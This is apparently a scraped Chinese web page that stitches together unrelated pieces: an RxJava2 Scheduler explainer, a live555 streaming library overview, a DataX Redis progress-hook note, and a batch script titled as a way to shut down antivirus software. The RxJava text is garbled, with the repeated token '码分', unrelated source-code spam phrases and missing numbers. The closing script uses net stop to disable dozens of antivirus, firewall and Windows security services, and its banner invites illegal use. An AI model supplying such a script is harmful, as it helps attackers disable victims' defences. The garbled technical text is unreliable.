1.深入理解 RxJava2:Scheduler(2)
2.每日开源:一个巨硬的码分产品级嵌入式流媒体库
3.如何评价datax的应用?
4.用cmd命令关杀毒软件
深入理解 RxJava2:Scheduler(2)
欢迎来到深入理解 RxJava2 系列第二篇,本文基于 RxJava 2.2.0 正式版源码,码分将探讨 Scheduler 与 Worker 的码分概念及其实现原理。
Scheduler 与 Worker 在 RxJava2 中扮演着至关重要的码分角色,它们是码分线程调度的核心与基石。虽然 Scheduler 的码分倍量柱指标源码公式作用较为熟悉,但 Worker 的码分概念了解的人可能较少。为何在已有 Scheduler 的码分情况下,还要引入 Worker 的码分概念呢?让我们继续探讨。
首先,码分Scheduler 的码分核心定义是调度 Runnable,支持立即、码分延时和周期性调用。码分而 Worker 是码分任务的最小单元的载体。在 RxJava2 内部实现中,码分通常一个或多个 Worker 对应一个 ScheduledThreadPoolExecutor 对象,这里暂不深入探讨。
在 RxJava 1.x 中,Scheduler 没有 scheduleDirect/schedulePeriodicallyDirect 方法,只能先创建 Worker,再通过 Worker 来调度任务。这些方法是对 Worker 调度的简化,可以理解为创建一个只能调度一次任务的 Worker 并立即调度该任务。在 Scheduler 基类的源码中,默认实现是直接创建 Worker 并创建对应的 Task(虽然在部分 Scheduler 的覆盖实现上并没有创建 Worker,但可以认为存在虚拟的 Worker)。
一个 Scheduler 可以创建多个 Worker,这两者是魔神争霸源码一对多的关系,而 Worker 与 Task 也是一对多的关系。Worker 的存在旨在确保两件事:统一调度 Runnable 和统一取消任务。例如,在 observeOn 操作符中,可以通过 Worker 来统一调度和取消一系列的 Runnable。
RxJava2 默认内置了多种 Scheduler 实现,适用于不同场景,这些 Scheduler 都可以在 Schedulers 类中直接获得。以下是两个常用 Scheduler 的源码分析:computation 和 io。
NewThreadWorker 在 computation、io 和 newThread 中都有涉及,下面简单了解一下这个类。NewThreadWorker 与 ScheduledThreadPoolExecutor 之间是一对一的关系,在构造函数中通过工厂方法创建一个 corePoolSize 为 1 的 ScheduledThreadPoolExecutor 对象并持有。
ScheduledThreadPoolExecutor 从 JDK1.5 开始存在,这个类继承于 ThreadPoolExecutor,支持立即、延时和周期性任务。但是注意,在 ScheduledThreadPoolExecutor 中,maximumPoolSize 参数是无效的,corePoolSize 表示最大线程数,且它的队列是无界的。这里不再深入探讨该类,否则会涉及太多内容。
有了这个类,RxJava2 在实现 Worker 时就站在了巨人的网络骰子源码肩膀上,线程调度可以直接使用该类解决,唯一的麻烦之处就是封装一层 Disposable 的逻辑。
ComputationScheduler 是计算密集型的 Scheduler,其线程数与 CPU 核心数密切相关。当线程数远超过 CPU 核心数目时,CPU 的时间更多地损耗在了线程的上下文切换。因此,保持最大线程数与 CPU 核心数一致是比较通用的方式。
FixedSchedulerPool 可以看作是固定数量的真正 Worker 的缓存池。确定了 MAX_THREADS 后,在 ComputationScheduler 的构造函数中会创建 FixedSchedulerPool 对象,FixedSchedulerPool 内部会直接创建一个长度为 MAX_THREADS 的 PoolWorker 数组。PoolWorker 继承自 NewThreadWorker,但没有任何额外的代码。
PoolWorker 的使用方法是从池子里取一个 PoolWorker 并返回。但是需要注意,每个 Worker 是独立的,每个 Worker 内部的任务是绑定在这个 Worker 中的。如果按照上述方法暴露 PoolWorker,会出现两个问题:
为了解决上述问题,需要在 PoolWorker 外再包一层 EventLoopWorker。EventLoopWorker 是一个代理对象,它会将 Runnable 代理给 FixedSchedulerPool 中取到的 PoolWorker 来调度,并负责管理通过它创建的任务。当自身被取消时,会将创建的任务全部取消。
与 ComputationScheduler 恰恰相反,cad 源码下载IoScheduler 的线程数是无上限的。这是因为 IO 设备的速度远低于 CPU 速度,在等待 IO 操作时,CPU 往往是闲置的。因此,应该创建更多的线程让 CPU 尽可能地利用。当然,并不是线程越多越好,线程数目膨胀到一定程度会影响 CPU 的效率,也会消耗大量的内存。在 IoScheduler 中,每个 Worker 在空置一段时间后就会被清除以控制线程的数目。
CachedWorkerPool 是一个变长并定期清理的 ThreadWorker 的缓存池,内部通过一个 ConcurrentLinkedQueue 维护。和 PoolWorker 类似,ThreadWorker 也是继承自 NewThreadWorker。仅仅是增加了一个 expirationTime 字段,用来标识这个 ThreadWorker 的超时时间。
在 CachedWorkerPool 初始化时,会传入 Worker 的超时时间,目前是写死的 秒。这个超时时间表示 ThreadWorker 闲置后最大存活时间(实际中不保证 秒时被回收)。
IoScheduler 中也存在一个 EventLoopWorker 类,它和 ComputationScheduler 中的作用类似。因为 CachedWorkerPool 是每隔 秒清理一次队列的,所以 ThreadWorker 的存活时间取决于入队的时机。如果一直没有被再次取出,chromium 源码 大小其被实际清理的延迟在 - 秒之间。
熟悉线程的读者会发现,ComputationScheduler 与 IoScheduler 很像某些参数下的 ThreadPoolExecutor。它们对线程的控制外在表现很相似,但实际的线程执行对象不一样。这两者的对比有助于我们更深刻地理解 Scheduler 设计的内在逻辑。
Scheduler 是 RxJava 线程的核心概念,RxJava 基于此屏蔽了 Thread 相关的概念,只与 Scheduler/Worker/Runnable 打交道。
本来计划继续基于 Scheduler 和大家一起探讨 subscribeOn 与 observeOn,但考虑到篇幅问题,这些留待下篇分享。
感谢大家的阅读,欢迎关注笔者的公众号,可以第一时间获取更新,同时欢迎留言沟通。
每日开源:一个巨硬的产品级嵌入式流媒体库
哈喽,我是老吴。
今天分享一个比较复杂的开源项目:live 是一个开源的流媒体库,用于实现实时流媒体的传输和处理。它提供了一套跨平台的 C++ 类库,帮助快速构建高效、可靠的流媒体服务器和客户端应用程序。
live的代码量庞大,约9w行代码。如果专注于核心逻辑,代码量缩减到约8K行。使用live,你可以收获高效可靠的流媒体库,了解产品级的C++项目设计,掌握音视频基础知识,甚至获得基于select()的C++事件循环库。live在媒体播放器、流媒体服务器、视频监控系统等领域应用广泛,如VLC、FFmpeg、GStreamer均使用live实现流媒体的接收和播放。
live基于C++,语法相对简单,适合专注于学习C++类设计和编写专业的C++软件。为了理解源码,需要补充多媒体、流媒体的理论知识。通过阅读和运行相关应用,加深对理论知识的理解。
编译live库后,会生成4个静态库:libBasicUsageEnvironment.a和libUsageEnvironment.a用于实现事件循环、上下文管理、任务管理等;libliveMedia.a负责多媒体流化,包括音视频编解码、流媒体协议实现;libgroupsock.a负责网络IO功能,核心是TCP、UDP的读写。简单示例是RTP传输MP3音频,涉及server和client两个程序。
server程序的核心逻辑包括准备运行环境、设置数据来源、设置数据目的地。TaskScheduler用于任务管理,基于select()实现事件循环。BasicUsageEnvironment用于上下文管理。数据流化本质是网络传输,Source和Sink分别表示数据源和目的地,本例中Source是MP3FileSource,Sink是MPEG1or2AudioRTPSink。client端程序同样初始化Source和Sink。
RTP协议简介,RTP(Real-time Transport Protocol)是一种用于实时传输音频和视频数据的网络传输协议,基于UDP,用于在IP网络上传输实时媒体数据。RTP协议设计目标是提供低延迟、高效率的传输,以满足实时应用需求。主要特点包括时间戳、序列号、负载类型、NACK反馈和RTCP(Real-time Transport Control Protocol)等。
关键问题是如何实现数据一帧帧流化?关注点不是具体音视频格式解析或特定协议实现,而是live对音视频流化的整体框架。通过示例分析,live本质上将音视频数据逐帧解码,通过RTP协议经网络发送。live封装了多种数据Source和Sink,但无需详细了解每个概念。仍以RTP传输MP3数据为例,分析live的工作流程。
首先,需要对相关类的关系有大概概念:MediaSource是所有Source的父类,各种具体音视频Source基于其派生;MediaSink是所有Sink的父类,派生出FileSink、RTPSink等众多Sink类。Sink类最关键的成员函数是startPlaying(),用于使用Source对象获取帧数据,然后发送至网络。
RTP传输MP3的主要逻辑包括准备就绪后调用MediaSink::startPlaying()启动数据流化,在packFrame()调用Source对象的getNextFrame()。getNextFrame()最终调用MP3FileSource的doGetNextFrame(),负责MP3音频解码,解码完成后,回调afterGettingFrame(),正常时调用sendPacketIfNecessary()发送数据,并添加至事件循环调度器中。一段时间后,MultiFramedRTPSink的sendNext()被调用,推动新一帧数据传输,直到Source中的所有帧数据被消费。
live如何创建RTSP服务器?通常RTP协议与RTSP协议结合使用,对外提供RTSP服务器服务。RTSP提供控制实时流媒体传输和播放的标准化方式,可以控制播放、暂停、停止、快进、后退等功能。添加几行代码即可创建RTSP服务器。RTSP服务器封装实现RTSP服务,类似HTTP协议,是文本协议。服务器包括接受客户端连接、读取客户端数据、解析和处理数据的操作。
总结,live是一个开源的多媒体流媒体库,支持常见流媒体协议,提供高效可靠的流媒体传输功能,适用于构建流媒体服务器和客户端应用程序。使用live需要熟悉C++编程和网络编程知识,官方提供丰富示例代码,帮助快速熟悉库的使用方法。
如何评价datax的应用?
为了改进datax任务进度信息展示方式,我们计划对源码进行改造,将实时任务进度信息结构化存储在redis服务器中,让前端通过轮询实时从redis中获取进度信息,从而提供给用户更友好的体验。
在分析datax任务进度信息的打印逻辑时,我们发现这些信息首先被task group汇总收集,然后由job进一步汇总收集。因此,job能够收集并汇总所有任务的进度信息。
进一步探究,我们了解到JobContainer依赖的Scheduler会周期性打印job收集汇总的进度信息。具体实现可见于源码中的com.alibaba.datax.core.job.scheduler.AbstractScheduler#schedule函数,以及com.alibaba.datax.core.statistics.container.communicator.job.StandAloneJobContainerCommunicator#report函数。
了解了datax的hook机制后,我们能够设计实现从datax实时获取并持久化进度信息至redis的功能。关键在于,我们可以在打印进度信息的时机触发invokeHook方法,通过配置信息和进度信息作为参数,调用自定义实现的Hook类的invoke方法。具体地,我们设计了一个名为RedisReportHook的自定义Hook类,用于将进度信息持久化至redis。
用cmd命令关杀毒软件
用BAT文件吧
源码如下:
@echo off
Color 0A
echo =============================================
echo + Day Wan专用杀防火墙及杀毒软件程序 +
echo + +
echo + 请用于非法用途,谢谢合作 +
echo ---------------------------------------------
echo + /daywan +
echo =============================================
@echo off
net stop "Turbo Vaccine Monitoring Service"
net stop "MonSvcNT"
net stop "rising process communication center"
net stop "rising realtime monitor service"
net stop "OfficeScanNT Monitor"
net stop "RemoteAgent"
net stop "Ahnlab Task Scheduler"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop " McAfee SecurityCenter Update Manager "
net stop "McShield"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sygate Personal Firewall"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "Quick Heal Online Protection"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Security Center"
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "NAV Alert"
net stop "NAV Auto-Protect"
net stop "ScriptBlocking Service"
net stop "DefWatch"
net stop "Background Intelligent Transfer Service"
net stop "System Event Notification"
net stop "BlackICE"
net stop "AVSync Manager"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop "InVircible Scheduler"
net stop "kavsvc"
net stop "avast! Antivirus"
net stop "avast! iAVS4 Control Service"
net stop "Trend ServerProtect Agent"
net stop "Trend ServerProtect "
复制好粘贴到记事本上,保存为BAT文件就可以了...
我也是在别出搜集到的....